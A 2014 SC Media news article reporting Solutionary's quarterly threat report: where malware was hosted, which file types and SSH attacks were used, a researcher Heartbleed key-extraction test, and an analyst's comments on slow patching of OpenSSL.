Incident Response, Malware, TDR

U.S. hosted most Q2 malware, top 10 ISPs still main sources

More than half — 56 percent — of the malware captured in the second quarter of 2014 and analyzed by Solutionary's Security Engineering Research Team was hosted in the United States, according to a recent report.

That figure represented a 12 percent increase from the fourth quarter of 2013, according to the "Q2 2014 SERT Quarterly Threat Intelligence Report." 

Hosting was up in France and Ireland as well as the Virgin Islands, but the increases were more modest, ranging from two to three percent.

While the top 10 ISPs were the source of most malware (51 percent) — with Amazon accounting for the biggest chunk and retaining the top spot, at 41 percent — Q2 2014 saw GoDaddy drop off, slipping to ninth position and accounting for just two percent of the trapped malware, down from 16 percent. 

In the second quarter, smaller providers such as Akrino and Website Welcome saw an increase in hosted malware.

Noting that hosting often shifts from quarter to quarter, Chad Kahl, Solutionary SERT Threat Analyst, told in an email correspondence that “Jumping from ISP to ISP has been a common tactic to provide cover and obfuscation, and add complexity to forensic investigations for many years.”

The report also found that HTML and Windows executables (PE32) were leveraged the most by attackers, PE32 alone accounted for 49 percent of the exploits but when coupled with HTML, the figure rose to 81 percent.

Researchers noted that attackers repeatedly chose SSH as a way to gain administrative access to targets, with China taking the lead, accounting for 45 percent of the attacks, followed by the U.S. at 17 percent. 

Disturbingly, researchers were able weaponize and exploit Heartbleed in OpenSSL — after 48,000 heartbeat requests, the team extracted a private key. SERT members warned that organizations could mistake the activity generated by tens of thousands of requests for another type of attack, such as denial-of-service (DoS).

The report said that amidst the hoopla surrounding Heartbleed, the aspect "that did not receive much coverage was the effect of exploit attempts on the system."

“When you exploit Heartbleed, 64KB is the maximum amount of random data that can be retrieved with one request. To get the specific piece of data required, an attacker may have to submit millions of requests,” said Kahl. “Millions of requests rapidly being sent to one server can overwhelm many different components, including CPU, NIC, RAM, etc. It would be easy to mistake this activity for a denial-of-service attempt, completely missing that the real attack is exfiltrating data.”

Despite the uproar over Heartbleed, many organizations continue to use vulnerable versions of SSL, for many reasons, Kahl said, noting that two stand out in the course of doing the second quarter report.

“First, during the research for our 2014 GTIR, we discovered that the average remediation time for vulnerabilities ranges between 146 and 197 days, depending on whether or not they have a VLM program. 146 days…that is almost five months. We also discussed doing the basics versus doing the basics well. Patch management represents a powerful opportunity for improvement in many organizations,” he said. “Secondly, there is the issue of embedded code. Network devices, third party software, and more utilize OpenSSL in their own code to establish secure channels of communication. So now we have to wait for the developer to update their code, which may or may not happen.” 

As a result, “the situation rolls back to my first point, which is having to depend on the patch management procedures to do their job,” added Kahl.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.